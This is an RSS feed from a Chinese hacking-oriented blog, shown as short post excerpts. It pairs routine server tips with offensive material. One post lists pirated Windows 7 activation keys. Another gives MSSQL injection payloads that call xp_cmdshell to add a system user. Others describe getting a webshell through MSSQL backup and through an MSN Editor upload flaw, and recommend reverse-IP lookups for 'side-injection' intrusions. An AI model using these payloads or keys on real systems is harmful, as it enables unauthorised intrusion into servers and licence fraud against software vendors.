无忧安全网http://www.51safe.net/专注系统安全,专注网络安全,专注黑客技术RainbowSoft Studio Z-Blog 1.8 Arwen Build 90619zh-CN关于本站 | 安全业务 | 联系我们 | 广告服务 | 友情链接 | 加入收藏夹Copyright 2008-2010 无忧安全网 All rights reserved.Powered By Z-BlogICP备案编号:闽ICP备09054386号 Thu, 17 Feb 2011 15:03:19 +0800win7神KEY激活成功freboys@163.com (freboys)http://www.51safe.net/article/Skills/win7.htmThu, 10 Dec 2009 23:26:23 +0800http://www.51safe.net/article/Skills/win7.htm安装了64位的WIN7系统,使用神KEY激活成功,人品暴好。

发一组win7神Key

236TW-X778T-8MV9F-937GT-QVKBB
KH2J9-PC326-T44D4-39H6V-TVPBY
TFP9Y-VCY3P-VVH3T-8XXCC-MF4YK
J783Y-JKQWR-677Q8-KCXTF-BHWGC
C4M9W-WPRDG-QBB3F-VM9K8-KDQ9Y
2VCGQ-BRVJ4-2HGJ2-K36X9-J66JG
MGX79-TPQB9-KQ248-KXR2V-DHRTD
FJHWT-KDGHY-K2384-93CT7-323RC

 激活的时候,可以多试几次,看看运气如何。

]]>经验技巧http://www.51safe.net/article/Skills/win7.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=48http://www.51safe.net/cmd.asp?act=tb&id=48&key=51a66da7mssql注入经常使用的命令freboys@163.com (freboys)http://www.51safe.net/article/Skills/mssql-injection-conmmand.htmSat, 28 Nov 2009 09:00:08 +0800http://www.51safe.net/article/Skills/mssql-injection-conmmand.htm①、是否存在xp_cmdshell

and 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')

②、用xp_cmdshell执行命令

;exec master..xp_cmdshell "net user name password /add"--
...

]]>经验技巧http://www.51safe.net/article/Skills/mssql-injection-conmmand.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=47http://www.51safe.net/cmd.asp?act=tb&id=47&key=7e7a8292JSP探针-虚拟主机JSP环境检测工具freboys@163.com (freboys)http://www.51safe.net/article/tools/jspcheck.htmFri, 27 Nov 2009 23:28:22 +0800http://www.51safe.net/article/tools/jspcheck.htm         服务器配置好了JSP环境,需要测试一下配置是否正确,下面的代码可以用来侦测JSP主机的运行环境,例如操作系统、JDK版本、Servlet/JSP容器等信息。

]]>常用工具http://www.51safe.net/article/tools/jspcheck.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=46http://www.51safe.net/cmd.asp?act=tb&id=46&key=6d56d2ceWeb Disk Manager网页版文件浏览器freboys@163.com (freboys)http://www.51safe.net/article/Program/Web-Disk-Manager.htmThu, 26 Nov 2009 23:58:54 +0800http://www.51safe.net/article/Program/Web-Disk-Manager.htm       网页版文件浏览器,完全模仿Windows文件管理器,小巧,清爽。

]]>程序设计http://www.51safe.net/article/Program/Web-Disk-Manager.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=45http://www.51safe.net/cmd.asp?act=tb&id=45&key=0b706f48WinWebMail只能发信不能收信一次解决过程freboys@163.com (freboys)http://www.51safe.net/article/Skills/WinWebMail-Can-Send-Can't-Receive.htmThu, 26 Nov 2009 23:50:30 +0800http://www.51safe.net/article/Skills/WinWebMail-Can-Send-Can't-Receive.htm

       环境:windows2003 sp2+WinWebMail 3.8.0.1+Symantec杀毒

      使用很久的WinWebMail邮件服务器,实然出现了只能发信不能收信的故障,在排除了POP3和SMTP服务的问题后,通过系统命令Nslookup检查出域名的MX(邮件交换记录)解析错误所致,重新解析域名的MX记录,问题完美解决!

]]>经验技巧http://www.51safe.net/article/Skills/WinWebMail-Can-Send-Can't-Receive.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=44http://www.51safe.net/cmd.asp?act=tb&id=44&key=7c641162目录扫描工具wwwscanfreboys@163.com (freboys)http://www.51safe.net/article/tools/wwwscan.htmWed, 25 Nov 2009 10:59:35 +0800http://www.51safe.net/article/tools/wwwscan.htm      扫描网站目录很好的一个工具,目录数据库已做了大量的优化。自己可以扩展自己的目录库,只要将对应的目录添加到cgi.list这个文件里就可以了。些工具在命令提示符下运行。

 

<Usage>:  wwwscan.exe <HostName|Ip> [Options]

<Options>:

          -p port        : set http/https port

...
]]>常用工具http://www.51safe.net/article/tools/wwwscan.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=43http://www.51safe.net/cmd.asp?act=tb&id=43&key=2571eabbIP地址反查,查询同IP绑定站点数量freboys@163.com (freboys)http://www.51safe.net/article/tools/reverse-ip-domain-neighbors.htmWed, 25 Nov 2009 10:32:29 +0800http://www.51safe.net/article/tools/reverse-ip-domain-neighbors.htm  玩黑的朋友都知道旁注。旁注,顾名思义是从旁注入,也就是说同从一台服务器的其它站上下手,来达到我们入侵的目的。但是如何知道同一台服务器挂了多少个网站呢?有一些网站专门提供了这种功能,即通过IP或者域名可以查询出这台服务器中绑定的域名数量。同时通过这种方法,我们在选购虚拟主机空间时可以做相关参考,因为服务器中用户太多就会影响自己网站的网速,甚至会对自己的网站的安全存在威胁。所以你在购买虚拟主机的时候,也不妨先查查其同台服务器中放置网站的个数。

  下面列出的这些网站,是我平时用的比较多的IP地址反查网站。

...

]]>常用工具http://www.51safe.net/article/tools/reverse-ip-domain-neighbors.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=42http://www.51safe.net/cmd.asp?act=tb&id=42&key=c73b8d24ZBlog如何统计浏览次数和显示浏览次数freboys@163.com (freboys)http://www.51safe.net/article/Skills/zblog-Count-views.htmTue, 24 Nov 2009 09:08:38 +0800http://www.51safe.net/article/Skills/zblog-Count-views.htm  这几天模板修改了,没有过多的检查,今天早上一看Blog,怎么每篇文章的浏览次数没有增加,每天怎么说也有几个人浏览,怎么这个统计没有增加呢?于是跟正常的Blog做了对比,发现原来模板里改的有点问题,修复一下就可以了,修复过程如下:

  确保在模板文件夹TEMPLATE下的 default.html,single.html,catalog.html 等页面的头部有如下代码:

头部代码:

<script  type="text/javascript">
...

]]>经验技巧http://www.51safe.net/article/Skills/zblog-Count-views.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=41http://www.51safe.net/cmd.asp?act=tb&id=41&key=69b16834MSN Editor网页编辑器漏洞freboys@163.com (freboys)http://www.51safe.net/article/bugs/MSN-Editor-Bugs.htmTue, 24 Nov 2009 00:09:08 +0800http://www.51safe.net/article/bugs/MSN-Editor-Bugs.htm  MSN Editor网页编辑器是一个比较简陋,没有管理后台的编辑器。正因为他功能简单,所以给我们得到webshell带来一定的难道。但是它的图片上传程序存在利用的漏洞,那就是对于修改修改上传图片文件名处理不当,导致我们可以完美的利用IIS6文件解析漏洞拿到webshell。

MSN Editor网页编辑器

]]>漏洞收集http://www.51safe.net/article/bugs/MSN-Editor-Bugs.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=40http://www.51safe.net/cmd.asp?act=tb&id=40&key=11a6591bMssql备份得webshell突破特殊字符限制freboys@163.com (freboys)http://www.51safe.net/article/Skills/Mssql-backup-a-webshell.htmSat, 21 Nov 2009 08:55:55 +0800http://www.51safe.net/article/Skills/Mssql-backup-a-webshell.htm1.插入数据

mssql注射使用Backup或makewebtask得到webshell,在写入webshell代码时,如果过滤了一些特殊字符,如" '等。我们先mssql分析器里“查询”:

use pubs; <===使用数据哭pubs
create table cmd (str image); <===建立个表cmd 一个属性为image的列
...

]]>经验技巧http://www.51safe.net/article/Skills/Mssql-backup-a-webshell.htm#commenthttp://www.51safe.net/http://www.51safe.net/feed.asp?cmt=39http://www.51safe.net/cmd.asp?act=tb&id=39&key=646cfaea